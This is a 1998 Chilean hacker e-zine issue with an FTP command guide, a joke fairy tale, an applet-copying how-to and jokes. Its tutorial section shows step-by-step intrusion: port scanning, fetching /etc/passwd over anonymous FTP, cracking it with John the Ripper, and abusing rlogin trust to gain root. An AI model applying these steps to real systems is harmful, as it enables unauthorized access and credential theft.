                   ....                 
                .oH*RR$Wx.              
               x*#"~```"!Rn             
              z!~        ~@!            
             xZ~+osem+e.  `Mi         ¡¡BIENVENIDOS -- BIENVENIDOS!!
             $? 'M$$~4$$L  `$:          
            dR   WTQ  Q$$   !W       ~ AL PRIMER MAGAZINE ELECTRONICO ~         
            *!   RN$  $$*   `R                  <<CHILENO>>
            !>   !@$ .R$!    !k         
           '$    $$$oW@#     @k         
           '$    $TR?$$      @F      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      
           'R    $WR4$$L     $!      Õ                                Õ
            $L   $$R RTN    :$~      Õ       >>>-PROYECTO_R-->        Õ
            ?B   $$R `M$:   X$       Õ                                Õ
            `$:  $EN  M$W: .*F       Õ  "La copia infeliz del Eden"   Õ
             !$.+***@.`*!R.!H        Õ   @@@@@@@@@@@@@@@@@@@@@@@@@    Õ
             `?NL      ```W@"        Õ                                Õ
              `#$m.    .u@#~         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                ~H#tWXW$*"`             
                 ``"""""

                                  NUMERO "2"

                               24 Julio de 1998

                                                              
                Url      : http://prm.home.ml.org
                           http://www.bigfoot.com/~proyecto_r
                     	   http://www.geocities.com/colosseum/sideline/9497

		E-Mail	 : proyecto_r@bigfoot.com 

     

     Colaboradores de Este nuemro :
     
     == AnDyK ==
     == TAkER ==     
     == PlaXiuS == pa` variar .- uta el won cabron .-
     == PlaXiuLiNa ==

     Desaparecidos en Accion :

     == BlackviruZ ==
     == Superhenry ==
     == Pinguro ==



     SOPORTE 911
 
  Usuario  : Alo soporte .
  Computin : Si digame , en que puedo servirle (pa' variar simpre eficiente).
  Usuario  : Sabe que mi monitor esta medio borroso , y esta hace dias asi .
  Computin : Mmmmm , ¡¿se puso los lentes!?.
  Usuario  : Sii seguro (mientras se los pone jeje).
  Computin : Ya ok hagamos lo siguiente , ponga su mano sobre el monitor .
  Usuario  : Ok .
  Computin : Ahora muevala suavemente en forma circular .
  Usuario  : Ok
  Computin : Se ve mas claro ahora ??? .
  Usuario  : SIIII , ahora .. si muchas gracias ...
  Computin : De nada , estamos para servirle (jejeje)
  Usuario  : USTED SI QUE SABE HEE!!! ... .- (PLOP) .-


    

################################# INDICE ###################################
#                                                                          #
#  1 Editorial ................................................Editor      #
#  2 Manual de bolsillo del FTP ...............................TAkER       #
#  3 Hack en accion BAsICO II (y desde Guindoze 95)............PlaXiuS     #
#  4 Caperucita Roja en el Cyberespacio .......................VarioS      #
#  5 Como conseguir Applets Java sin morir en el intento ......PlaXiuS     #
#  6 Chistes , cuentos y cualquier burrada que se te ocurra ...VarioS      #
#  7 Hackeando a Travez de CTCREUNA ...........................AnDyK       #
#  8 Pequeña Introduccion al Phonetag .........................TAkER       #
#  9 BackDoorS (NewS) .........................................Proyecto_R  #       
# 10 Por amor o placer ........................................PlaXiuLiNA  #
# 11 Log del Congreso .........................................Anonimo     #
# 12 ShutDown .................................................Proyecto_R  #    
#                                                                          #
############################################################################



                             ~~~~~~~~~~~~~~~~~
                             #               #
                             # 1.- EDITORIAL #
                             #               #
                             ~~~~~~~~~~~~~~~~~

______________________________________________________________________________________ By Editor


Hola como estan todos .. Bienvenidos al numero "2" de Proyecto_R , como veen
hemos logrado el ansiado y normalmente difil segundo numero , Aunque UD. no
lo crea . Hemos recibido buenos comentarios como tambien varios malos , pero
no nos desanimaremos y seguiremos con este loko proyecto , ya que nos sobran
ganas ;  y aunque no falten los tipos que se dedican a transmitir malas vibras ... solo los ignoraremos y trabajaremos mas y mas duro por este magazine.
Aquellos que nos critiquen por ser nuevos en el ambiente , les decimos con
mucho cariño que se metan sus opiniones por el culo , casi todos los E-Zines
de este tipo comienzan con bastante modestia y nosotros no nos saldremos de
ese contexto , ya que creemos o mas bien queremos apuntar nuestro E-Zine a
aquellos novatos que abundan por inet , preguntando e investigando ..., La
verdad era bastante tedioso navegar y navegar , encontrar paginas y paginas
que tienen un par de calaberas , fondo negro , y unos cuantos programas
baratos para bajar o llenos de links a otras paginas con exactamente los mis
mos contenidos (mas bien dicho ninguno) , pero de informacion nada ... :((
era vivir en la mas pura ignorancia .
Sobre las publicidades .. es decir que siempre hablamos de otras publicaciones
, mas que por respeto lo hacemos para que los lectores que no las conocen
tengan accesos a ellas , la verdad cuantas veces no recibi correos de
Mexicanos haciendo preguntas sobre hacking , normalmente les respondia una
breve explicacion a sus dudas (si sabia por supuesto) y despues los derivaba
a RAREGAZZ , ya que no tenian idea que existia ... No queremos privar a
nuestros lectores a la informacion aki referidad la idea es que la gente se
informe y aprenda cosas nuevas cada dia , y hay muchos E-Zines de los cuales
estamos a años luz . No somos competidores ni tampoco creemos en la
competencia entre E-Zines , yo personalmente me las leo todas , y cualquier
articulo que pillo por ahí tambien .. Hay grandes colaboradores en otros
E-Zines y nosotros aun somos poquitos y novatos en el ambiente , pero bueno
hechando a perder se aprende o no ???
Aun estamos esperando a mas colaboradores y gente que se animen a escribir sus
articulos , para hacer crecer este magazine , traductores , gente de la
telefonica , administradores e incluso comentarisatas deportivos :)) .-
Tenemos muchos proyecto en mente pero mientras no veamos que esto realmente
funciona , y que aumente la cantidad de colaboradores , no nos gastaremos en
ellos , preferimos trabajar fuerte en el magazine y no dejarlos de lado por
otros proyectos menores . Si alguien se interesa en recolectar noticias , Bugs
, Informaciones en gral. que nos mailee para reservarle un espacio en este
magazine .


Bueno no los aburro mas y vamos a la accion .

PlaXiuS
El Editor.

((((((((((((((((((((((((((((((((((fin)))))))))))))))))))))))))))))))))))))))))   	



                         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                         #                               #
                         # 2.-Manual de Bolsillo del FTP #
                         #      No apto para 3l3373S     #
                         #                               #
                         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     (o por lo menos eso decia la portada del libro de donde lo saque >:->) 

______________________________________________________________________________________ By TAkER 


Esta pequeña introduccion espero qe sea util para aquellos que no saben como
diablos manejar el FTP, y les da pereza ponerse a buscar en los libros y en
todas partes. Aunque de vez en cuando es bueno apartarse de la pantalla del
PC y salir a buscar unos cuantos libros que sean de utilidad para tu
conociemiento >:->...jejeje

Ahora despues de la carreta vamos a empezar con los camandos del FTP y una
pequeña explicacion.

Empecemos por el principio...
Como p***s me conecto por FTP, pues...despues de esto sabras como (o por lo
menos pa' eso esta hecho este manual, si despues no sabes como mmmmm, mejor
busca otra diversion...)

Para iniciar el FTP en Guindous, te pasas al la ventana de DOS y escribis el
comando FTP, en Unix con el comando ftp, y para Guindous hay unas aplicaciones
como el WS_FTP muy difundida por ahi...pero como vamos a explicar los comandos
, pues les voy a explicar como funcionan los comandos desde la ventana de DOS
y en Unix.

!          Sale del Ftp, parece que empece por el final...pero bueno, asi esta
           el manual.

?          Te mostrara una pantalla con todos los comandos posibles del Ftp

append     Agrega un archivo a otro, necesario cuando se necesita actualizar
           un archivo indice de un directorio de warez..??
  
           Sample: Append file1 file2    esto agrega el file1 al file2,
           simple no .

ascii      Configura el tipo de Transferencia de archivos como ascii para que
           se puedan enviar o recibir archivos ascii o de texto
           Mas adelante habra una tabla con los tipos de archivos...

bell       El equipo emitira un sonido cada vez que termine de ejecutar una
           orden , personalmente me parece muy canson, para desactivarlo solo
           basta ejecutar el comando bell nuevamente.

binary     Lo mismo que el ascii pero al contrario, lo pone a transferir
           archivos binarios repito, pondre una tabla mas adelante y hasta
           algunos ejemplos.

bye        Termina la sesion de Ftp y cierra la aplicacion Ftp.

cd         Lo mismo que en el DOS cambia de directorio
           Sample: cd pub, cd dos, cd antivirus, cd lista, les suena..????

close      Termina la sesion Ftp sin cerrar la aplicacion Ftp

debug      Segun el manual, este activa o desactiva el modo de depuracion del
           Ftp, ???? nunca lo he usado, pa' algo debe servir, si alguien sabe
           me cuenta please.

delete     Pos su nombre lo dice, borra un archivo del server al que estemos
           conectados mejor no dejar el file1, pues solo va a estorbar tonces
           dale: delete file1

dir        Me sigue sonando a DOS y hasta hace lo mismo.

disconnect Pues se desconecta del server.

get        Recupera (hace un download) al archivo que te de la gana y lo pone
           en el directorio d trabajo del pc
           sample: get disco1.zip
 
glob       Activa o desactiva la expansion de metacaracteres de los nombres
           de los archivos locales. ??????

lcd        Cambia el directorio de tu pc, o sease como cd pero en tu pc.

literal    Envia ordenes Ftp arbitrarias. ???? ya como que estoy pensando en
           que otra persona debe escribir este manual..!!!

ls         Igual a la orden dir (cambia de directorio, esta explicacion es
           pa' los que acostumbran leer al revez).

mdelete    Borra varios archivos en el server remoto

mdir       Muestra el contenido de varios directorios del server remoto
           (mmmmm creo que es mejor verlos uno por uno)

mget       Recupera (hace un download) de varios archivos del server.

mkdir      Crea un directorio en el server remoto (funciona igual que en el
           DOS).

mls        Muestra la lista del contenido de varios directorios del server
           (igual al mdir)

mput       Manda archivos al server remoto (hace un upload)

open       Se conecta al servidor Ftp que le especifiques.
           sample: open 200.23.56.103

prompt     Hace que el Ftp te pida verificacion cuando se efectuan operaciones
           con varios archivos

put        Envia un archivo (upload)

pwd        Muestra el nombre del directorio actual del server remoto

quit       Termina la sesion del Ftp y cierra la aplicacion

quote      Envia ordenes Ftp arbitrarias al Server remoto....has oido hablar
           de este viejo bug...???

 ftp> open victima.com
 220 victima FTP server ready
 ftp> quote user ftp
 331 Guest login ok, send ident as password
 ftp> quote cwd ~root
 530 Please log with USER and PASS
 ftp> quote pass ftp
 230 Guest login ok. acces restrition apply.
 ftp> despues de esto ya estabas dentro como root, lastima que ya no funcione


recv       Recibe un archivo...mmmmmm, creo que ya me estoy cansando...

remotehelp Pide ayuda al server remoto

***** comentario aparte, estoy viendo un programa de sapos canivales en Discovery.... ********

rename     Cambia el nombre de un archivo (like in DOS)

rmdir      Elimina un directorio en el server remoto (no comments)

send       Envia un archivo (otra vez..???)

status     Muestra el estado actual de la sesion del Ftp. (ascii o binary, bell on u off, 
           debugging on u off, etc)

trace      Activa o desactiva el seguimiento de los paquetes.

type       Configura el tipo de transferencia de archivos (va junto con binary o ascii)

user       Te identifica ante el server remoto para dar los permisos de acceso.

verbose    Activa o desactiva el modo de mensajes detallados. ???????

Este libro se termino de impri....ummmm creo que me pase..jejejeje

Ahora va la tabla de archivos.

mmmmm me canse de escribir todo, lo unico que necesitan saber es que si los
archivos que van a subir o bajar del server son tipo texto (que se puedan
leer con cualquier editor de texto) pues el modo es ascii y si es binario
(.zip, .exe, .jpg, .gif etc) deben ponerlo modo binary

samples:

type binary * configura el modo de transferencia a binario
put hell.jpg
get doom2.zip

type ascii * configura el modo de transferencia a ascii
put file1.txt 
get index.txt


Si esto les parecio muuuuuuuyyy facil, entonces denle una ojeada a la SET 11,
alli hay mas sobre el Ftp, y puede que les guste mas....!!!

Para comantarios, sugerencias, madrazos etc... 

u_taker@geocities.com 

Suerte and be prhee

TAkER


((((((((((((((((((((((((((((((((((((((((((fin)))))))))))))))))))))))))))))))))))))))))))))))))))




                          ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          #                             #
                          # 3.- Hack en accion basico   #
                          #          Parte II           #
                          #     (desde guindoze 95)     #
                          #                             #
                          ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

__________________________________________________________________ By PlaXiuS


Bueno aki estamos ya en la segunda parte y final de esta saga , Como simpre
les recordamos que nuestro animo no es incitar a la ilegalidad , solo queremos
compartir información que no tiene nada de nueva , solo con fines educativos
y didacticos , no nos hacemos responsable por ningun acto ilicito que tu
cometas .

Bueno si no recuerdan en el capitulo anterior dejamos a nuestros heroes en
manos del vil villano .. a xuxa perdon me equivoque de texto .. ;) bueno como
decia entonces , en el capitulo anterior nos habiamos conectado al servidor a
travez de una cuenta por defecto del sistema . Bueno continuemos con el
trabajito jejej .- Entonces hacemos telnet con condon ...
( si no sabes leete el numero uno de Proyecto_R)


UNIX(r) Sytem Release 4.0

login:userpordefecto
password:passpordefecto
login incorrect

Shit nos cacharon , el administrador debe haber notado que trataron de entrar
en su sistema con esa cuenta.
Bueno que podemos hacer .. mmm ya se me ocurre algo en el articulo anterior
gracias al finger pudimos ver la direccion ip del root , eso significa que
podemos chequear si podemos conectarnos a su maquina .. mmm veremos que
podemos hacer .


Hacemos un escaneo de puertos a la direccion ip del Root , si es que podemos
jejeje .- Manos a la obra .-

El primer paso es saber si el Root esta conectado a Inet o que no este dentro
de una red interna de tal forma que podamos conectarnos a este ,..,, de lo
contrario estamos fritos ... veamos .. hacemos entonces un ping a la direcciòn
ip del Root .-

C:\WINDOWS>ping iproot

Pinging xxx.xx.xxx.xx with 32 bytes of data:

Reply from xxx.xx.xxx.xx: bytes=32 time=562ms TTL=46
Reply from xxx.xx.xxx.xx: bytes=32 time=431ms TTL=46
Reply from xxx.xx.xxx.xx: bytes=32 time=1001ms TTL=46
Reply from xxx.xx.xxx.xx: bytes=32 time=351ms TTL=46


Excelente .. el root esta conectado directamente a inet sin la utilizaciòn
de ningun proxy server
.. y al parecer sin estar detras de algun firewall .. esperemos .

Ahora tomamos nuestro programa escaneador de puertos y observemos que nos
depara el destino .... el resultado fue el siguiente .-

port 21 found. Desc='ftp'
port 23 found. Desc='telnet'
port 25 found. Desc='smtp'
port 37 found. Desc='time'
port 70 found. Desc='gopher'
port 79 found. Desc='finger'
port 80 found. Desc='www'
port 109 found.Desc='pop'
port 110 found. Desc='pop3'
port 113 found. Desc='auth'
port 143 found. 
port 513 found. Desc='login/who'
port 514 found. Desc='shell/syslog'
port 515 found. Desc='printer'

Volvemos al procedimiento anterior .. o sea a los ya repasados en el nuemro
uno .. veamos .-

Provemos el FTP !!!

C:\WINDOWS>ftp victima.com
Connected to victima.com.
220 www.victima.com FTP server (Version wu-2.4
:37:21 EST 1997) ready.
User (victima.com:(none)): anonymous
331 Guest login ok, send your complete e-mail
Password:
230-The response 'guest' is not valid
230-Next time please use your e-mail address a
230-        for example: joe@xxx.xxx.xxx.xx
230-Welcome, archive user!  This is an experim
230-unusual problems, please report them via e
230-If you do have problems, please try using
230-of your password -- this will turn off the
230-be confusing your ftp client.
230-
230 Guest login ok, access restrictions apply.
ftp> cd etc
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
ftp> get passwd
200 PORT command successful.
150 Opening ASCII mode data connection for passwd (79 bytes).
226 Transfer complete.
84 bytes received in 0.05 seconds (1.68 Kbytes/sec)
ftp> by
221 Goodbye.

Mmmm lo que que acabamos de hacer fue conectarnos por Ftp con nuestra vicitma
, luego nos fuimos al subdirectorio etc y ejecutamos un dir .. lo cual no nos
mostro nada , pero de igual manera probamos coger en passwd con el comando
get y nos resulto esto significa que el archivo passwd solo estaba oculto
pero no tenia ningun derecho en especial . Ahora solo tenemos que crackear el
fichero para obtener las contraseñas para entrar en este server . Hay muchos
programas que cumplen esta funcion pero el mas rapido y efectivo que conozco
es el John the ripper .

Como crackearlo aki van unos ejemplos --- dados por nuestro amigo TAkER
 
------------------------------------------------------------------------ 
john -single passwd 
Este metodo toma el nombre del usuario y apartir de el empieza a buscar 
haciendo diferentes 
combinaciones..=====> Javier Suarez buscara Jsuarez, JavierS, 
Sjavier...etc.. 
--------------------------------------------------------------------------------------------- 
john -wordfile:lista_de_palabras passwd 
Este toma un archivo de palabras y lo compara contra todos los passwd 
del file a crackear 
por lo tanto te toca conseguir una lista de palabras, /modo propaganda 
on/ por alla en mi 
pagina en la seccion de archivos encontraras un sitio FTP donde podras 
bajar como nmil listas 
de palabras pa que empieces a probar el john /modo propaganda off/ 
--------------------------------------------------------------------------------------------- 
john -incremental:all passwd 
Este metodo es algo como de fuerza bruta, por que prueba todas las 
combinaciones posibles y 
de seguro algo conseguiras...lo malo es que es demasiado lento. 
--------------------------------------------------------------------------------------------- 
heyyy casi lo olvido, hay una opcion buenisima... 
john -restore 
Inicia el john desde donde terminaste la ultima sesion, es buena en caso 
de que te toque 
suspender el trabajo por algun motivo, no la he ensayado en todas, pero 
debe servir lo mismo 
--------------------------------------------------------------------------------------------- 

Ahora ya tenemos un user y password para entrar en la maquina del root ahora vamos al ataque .
nos logearemso al equipo del ROOT si es que las claves que crackeo nuestro john son correctas , 
a todo esto paciencia que puede demorarse bastante en desencriptar las password , en especial
si usas el metodo incrmental ...  john -i  passwd .

login:root
password:********

Welcome at .............. last login bla bla bla!!!!!

root> rlogin victima.com
...
welcome at vicitma.com  ..............



Bien nos ha dado resultado !!!!
Lo que acabamos de hacer es logearnos al equipo de donde se conecta el root ,
que en este caso es otro server UNIX , ya que a este fue al cual pudimos
sacarle el fichero passwd , ahora estando adentro provamos hacer un rlogin a
la maquina victima , normalmente cuando el root se conecta desde otra maquina , para evitarse estar introduciendo el login y passwd a cada rato , crea a su maquina en
un archivo ubicado en etc/.hosts , cuando nos referimos a maquinas nos
referimos a sus direcciones ip , es decir que si tu tienes una cuenta shell o
trabajas con linux y pudes meter tu ip en este fichero ,al hacer un rlogin no
te pedira ni login ni passwd ....;> Es asi como entramos al sistema como ROOT
sin correr ningun exploit pero si con bastante trabajo como verannn... esto es
solo un resumen jejeje!!!!
Bueno en el proximo numero explicaremos como borrar nuestras huellas y talvez
algun otro metodo de hacking que pondremos en practica para tratar de
explicarte paso a paso este maravilloso ARTE !!!! Adiosito

PlaXiuS
plaxius@bigfoot.com


(((((((((((((((((((((((((((((((((fin))))))))))))))))))))))))))))))))))))))))))



                            ~~~~~~~~~~~~~~~~~~~~~~~~~
                            #                       #
                            # 4.-Caperucita Roja    #
                            #        en el          #
                            #      Cyberespacio     #
                            #                       #
                            ~~~~~~~~~~~~~~~~~~~~~~~~~


__________________________________________________________________ By VarioS

   Habia una vez un usuario de INTERNET, llamado k-perurroja que estaba con 
   sus amigos hablando en el IRC, canal #bosque. De pronto le llego un correo 
   de su mama, que le decia: "Hijo, por attachment te mando unos archivos 
   para el documento de HTML de tu abuelita, por favor, FTPeate a su cuenta y
   se los pasas para que ella pueda montar su pagina en el WWW. 
   Y asi, el usuario, cuyo login name era k-perurroja, se dispuso a 
   abrir una ventana, y a FTPearle a su abuelita los archivos que le habian 
   mandado. Estaba bajandolos del attachment del E-mail, cuando de pronto le 
   llego un talk de un usuario, de direccion e-lobo@hacker.bosque.com. 
   K-perurroja le contesto el talk, y e-lobo lo saludo y le pregunto que a
   donde iba.
   k-perurroja le contesto: 
   Voy a la cuenta de mi abuelita, a FTPearle un software a su cuenta para 
   que monte su pagina en el WWW. 
   Y asi, e-lobo hizo un telnet por un atajo, y llego a la cuenta de la 
   abuelita primero. Cuando la cuenta de la abuelita le pidio login ID, 
   el lobo le dio "k-perurroja", y crackeo el password y entro. 
   La abuelita, al ver que no era k-perurroja sino otra persona, trato de
   matarle el proceso, pero e-lobo fue mas veloz, y le mato el proceso a ella
   primero, y le cambio de password. Luego se tomo privilegios de ROOT en la
   maquina, y cambio el sistema operativo por uno diferente, que se parecia
   en todo, y hasta en la interfaz, al sistema operativo de la abuelita.
   Luego se metio a la cuenta de la abuelita, y se hizo pasar por ella. 
   Al rato llego k-perurroja, y cuando entro, noto un poco cambiada la 
   cuenta de su abuelita. Le hizo un talk, y le pregunto: 
   Abuelita, por que tienes esa cuota en disco tan grande?
   Ella le respondio: 
   Es para almacenar mis archivos mejor. 
   k-perurroja pregunto: 
   Abuelita, por que tienes esa interfaz grafica tan novedosa?
   Ella respondio: 
   Es para manejar mis archivos mejor. 
   k-perurroja pregunto: 
   Abuelita, porque tienes ese PBX tan grande? 
   Ella respondio: es para conectarme mejor. 
   k-perurroja se dio cuenta de que algo raro habia ahi .
   De pronto se percato: 
   Abuelita, porque tienes privilegios de ROOT? 
   Ella respondio: para CRACKEARTE MEJOR! 
   k-perurroja se dio cuenta de que esa no era su abuelita, y al hacerle 
   un "w" se dio cuenta de que estaba conectada desde e-lobo@hacker.bosque.com. 
   Inmediatamente mando un mail a security@cyberspace.cop.org para 
   delatar al impostor, y aunque este trato de bloquear el mail haciendole un 
   overload de memoria a la maquina, k-perurroja lo logro. 
 
   Al rato se conecto a la maquina uno de los investigadores de 
   cyberspace.cop, y al darse cuenta de lo que hacia e-lobo, le hizo un 
   overdride a la maquina, se tomo privilegios de ROOT y antes de que 
   e-lobo se diera cuenta, le mato el proceso y le cerro la entrada a la 
   maquina. 
 
   De entre la basura del sistema operativo de e-lobo, se pudo recuperar 
   la tabla de particion del sistema operativo de la abuelita, por lo que se 
   pudo recuperar toda su informacion, y la abuelita pudo recuperar su 
   trabajo, y montar su pagina en el WWW, que fue admirada por todos en el 
   cyberespacio. 
 


   Y COLORIN COLORADO ESTE CUENTO SE HA HACKEADO .. PERDONNN ... HA ACABADO !!!
 

(((((((((((((((((((((((((((((((((((fin))))))))))))))))))))))))))))))))))))))))


                          ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          #                             #
                          # 4.-Como conseguir Applets   #
                          #      Java sin morir         #
                          #       en el intento         #
                          #                             #
                          ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




__________________________________________________________________ By PlaXiuS






Bueno lo primero que dejaremos claro es la diferencia entre el Java y
JavaScript .

Java es un lenguaje de programacion muy parecido a C desarrollado por Sun
microsystem , siendo la promesa en lenguajes de programacion , por que tiene
la gracia que un mismo codigo fuente se ejecuta de igual manera en cualquier
sistema operativo , lo unico que cambia es el compilador ;) es decir , que
existen compiladores para diferentes sistemas operativos ..pero la fuente del
programa no cambia en ningun momento ( en teoria) .

Luego se junta Netscape y Sun microsystem para implementar este sistema en la
inet , de tal forma que netscape saca en su Navigator version 2.0 un soporte
Java  , en que consiste este soporte ;
a ejecutar dos tipos de implementacion de Java :

1.- El JavaScript , como su nombre lo dice es un script en java que esta
    escrito directamente en el documento Html . 

    Ejemplo .-



<SCRIPT>alert("LA POLITICA HONESTA PRODUCE CANCER ............ POR ESO EN
CHILE TENEMOS UNOS DE LOS MAYORES INDICES DE MUERTES POR CANCER , AUNQUE USTED
NO LO CREA ............");
</SCRIPT>



    Los codigos JavaScript se escriben entre las etiquetas <SCRIPT> y </SCRIPT>
    , en el ejemplo anteriror lo que hicimos fue mandar un alert en javascript
    .. para que funcione tenemos que situar el codigo entre las etiquetas
    <HEAD> y <BODY> .





2.- Applets Java , que son programas compilados en un archivo *.Class y que
    solo se le hace referencia en el documento Html , indicando en este , solo
    parametros y caracteristicas .,..
    el programa lo ejecuta el archivo *.Class .
    
    Ejemplo.-




< APPLET CODE="AnimText.class" WIDTH=600 HEIGHT=40>
  <PARAM NAME=text VALUE="Esto es una prueba de Applet Java">
  <PARAM NAME=font VALUE="TimesRoman">
  <PARAM NAME=type VALUE=1>
  <PARAM NAME=fgcolor VALUE="yellow">
  <PARAM NAME=min VALUE=12>
  <PARAM NAME=max VALUE=36>
  <PARAM NAME=naptime VALUE=100>
  <PARAM NAME=align VALUE=left>
</APPLET>

   Si nos fijamos en la primera linea se refiere a ' APPLET CODE="AnimText.class"
   donde AnimText.class es el nombre del Applet , lo que continua en la linea
   es el tamaño en que tendra efecto el applet y así sucesivamente las lineas
   siguientes indican el texto , fuentes
   etc.. . 

   Aqui viene la pregunta del MILLON , ¿ QUE PASA SI NO TIENES EL APPLET
   *.CLASS ? .
   La respuesta es simple .. consiguelo en inet jajajaja hay montones de
   Applets recorriendo la red ...jajaja.-

NOPE AKI TE EXPLICAREMOS COMO COGER AKELLOS APPLETS QUE ENCUENTRES INTERESANTES
Y QUE HAYAS VISTO EN OTRA PÁGINA .


Pero bueno vamos a lo nuestro .. MATERIALES A UTILIZAR , UN NAVEGADOR CUALQUIERA
, PACIENCIA Y MUCHA IMAGINACION .


** ALLA VAMOS **.-

   Tomaremos para este ejemplo la pagina del Gran Hermano ... Bigbrother ,
   Sicotic Magazine.-
   Asi aprovechan de verla que esta bien buena ... SALUDOS!!!!!!!!

   http://bigbrothe.islatortuga.com/
    	  
   Bueno se abrira un pagina con dos frames a los cuales le llamaremos Barra
   (el frame mas pequeño) y cuerpo (su nombre lo dice no ??) .-
   

   Si te fijas en el cuerpo debajo del titulo de la Web hay un bonito Applet
   que muestra un cuadrito en negro , con unas letras moviendose  al mas puro
   estilo del final de una pelicula o no?? bueno ... entonces por que no tener
   ese cuadrito en nuestra WEB que va a quedar bastante chula con ese monigote ...
   
   Pincha con el boton derecho el frame que contenga el applet que queramos en
   este caso el cuerpo . en el menu que te aparecera pincha la opcion de ver
   codigo fuente o Ver Origen dependiendo del navegador que ocupes .
   Observa que se desplazara en tu pantalla un documento que mostrara el
   codigo html de la pagina , ahora busquemos en el documento la etiqueta
   <APPLET CODE= etc...  en este caso el codigo completo seria :

 

<applet code="AJAScrollup.class" align="absmiddle" width="400" height="200">
<param name="bgcolor" value="0,0,0">
<param name="bold" value="0">
<param name="centeredtext" value="1">
<param name="desc0" value="Bienvenido a La Web del Gran Hermano">
<param name="desc1" value="Te recomiendo ke utilices el Netscape 3.0">
<param name="desc2" value="y una resolucion de 800x600 16bits.">
<param name="desc3">
<param name="desc4" value="En esta Pagina encontraras las siguientes">
<param name="desc5" value="Secciones :">
<param name="desc6" value="Editorial ( ESTO KE ESTAS VIENDO )">
<param name="desc7" value="Crackz , que gracias a MOBE, ya estan en servicio">
<param name="desc8" value="Seriales, desde canalwarez."
<param name="desc9" value="Fotos, de tias un poco despelotadas ;)~~">
<param name="desc10" value="Revistas Electronicas para Bajarte">
<param name="desc11" value="Lista de Servidores IRC Undernet">
<param name="desc12" value="Un Listado de Sites XXX con L/P">
<param name="desc13" value="La Revista Sicotic Magazine, de creacion Propia">
<param name="desc14" value="Peticiones de BigBroThe, Pa' ke kolaboreis">
<param name="desc15" value="Formulario, pa' estar al dia">
<param name="desc16" value="Linkz a otros siteZ de INet">
<param name="desc17" value="Y si todo esto te parece poco pos te JODES.">
<param name="desc18">
<param name="desc19" value="Hay ke destakar lo siguiente :">
<param name="desc20" value=" BigBrother no se hace responsable">
<param name="desc21" value="del mal uso ke se le pueda dar a la informacion">
<param name="desc22" value="ke en esta WEB se refleja.">
<param name="desc23" value="Esta WEB A SIDO KREADA POR BIGBROTHER">
<param name="desc24">
<param name="desc25" value="Este Aplet JAVA y los Botones del Indice">
<param name="desc26" value="han sido extraidos de la Web THE NEW MAFIA MAGAZINE.">
<param name="desc27" value="GRACIAS MAFIA POR PONER EL JAVA PARA TODOS !!!">
<param name="desc28">
<param name="desc29" value="Si kieres darme tu opinion acerca de algo o">
<param name="desc30" value="hacerme alguna sugerencia mandame un mail a : danbb@hotmail.com">
<param name="desc31" value="o pulsa sobre el boton E-Mail del Indice.">
<param name="font" value="times">
<param name="highlightcolor" value="0,0,100">
<param name="jump" value="1">
<param name="Notice" value="Smooth Scroll Up, (c) 1997 Op Unregistered">
<param name="numberoflines" value="32">
<param name="size" value="12">
<param name="speed" value="20">
<param name="textcolor" value="62,168,209">
</applet>



Bueno aki tenemos el codigo que tendremos que insertar en nuestra pagina ,
ahora solo tenemos que cambiar el texto y no seria mala idea cambiar otro
tipo de valores , no te lo vamos a decir todo no ??? dejemos algo a tu
imaginacion ...
Bueno ya tenemos el codigo para nuestra WEB que va a quedar pero MORTAL con
este codigo ,., pero nos falta lo mas importante .. el Applet Java , ya que
es este el que realizara el trabajo sucio .
Para obtenerlo solo nos fijaremos en la primera linea de este codigo ...( OJO
no simpre es asi hay codigos que contienen dos o mas applets asi que fijate
bien ) .



<applet code="AJAScrollup.class" align="absmiddle" width="400" height="200">



La linea me indica que el Applet se llama "AJAScrollup.class" , Esto es de
simple deduccion ya que cada vez que aparezca el "<applet code=" , el applet
JAVA debera estar en el mismo subdirectorio del HTML ;  asi que para salvar
este programita , lo unico que tenemos que hacer es lo siguiente .



     http://bigbrothe.islatortuga.com/AJAScrollup.class


Nos saldra la pantallita del tipico download , donde nos preguntara donde
queremos guardar el class ...jejeje que les parece ,.,,, No es nada del otro
mundo , cualquier persona que le dedique unos segundos mas al razonamiento se
percataria como bajar applets ...ahora si en la primera linea o donde
aparezca un *.class aparece los siguiente .

<applet codebase="applets" CODE="AJAScrollup.class" align="absmiddle"
 width="400" height="200">


Lo unico que tendriamos que hacer es ponerle el subdir que indica el codigo ..

     Ejemplo .-


     http://bigbrothe.islatortuga.com/applets/AJAScrollup.class



Es bastante importante mantener las mayusculas y minusculas cuando quieras
bajar el applet .
Otra cosita , pude que al bajar el applet *.class lo guarde en tu disco como
*.exe lo unico que tienes que hacer en ese caso es cambiar la extension del
archivo por *.class .

Nota .- Siempre que en el documento html aparezca solamente el
CODE="applet.class" , el applet debe estar por obligacion en el mismo
subdirectorio del documento HTMl ... Cuando aparezca la etiqueta
CODEBASE="dir del applet" esta indicara que el applet no se encuentra en el
mismo e incluso en el mismo server , la especificacion de la etiqueta codebase
te dira donde encontrar el applet , que puede hasta una direccion http .--


Bueno eso es todo espero que les haya servido de algo a alguien por que la
verdad es bastante basico lo que he escrito en estas lineas , ojala les haya
gustado .


Nota : Espero que el Gran Hermano no se moleste por haber ocupado su WEb para
este ejemplo , pero si es asi , mil disculpas ; al final tomalo por el lado
amable , estamos promoviendo tu WEB ;) que esta bastante instructiva y guena .


PlaXiuS
plaxius@bigfoot.com

(((((((((((((((((((((((((((((((((((fin))))))))))))))))))))))))))))))))))))))))




                          ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          #                             #
                          # 4.-CHistes , cuentos y      #
                          #     cualquier burrada       #
                          #     que se te ocurra...     #
                          #                             #
                          ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

___________________________________________________________________ By Varios

Esta sección esta scada de la lista de correo de nuestro amigo Charlie gomez
de colombia .
Que esta dedicada 100% al humor .


Cursos Universitarios Modernos hacia el año 2000 ITESM 
CURSOS PARA MUJERES: 
====================================================== 

"Acepta tu destino; has nacido mujer" 10 hrs. 
"Como superar la dependencia de tus amigas" 10 hrs. 
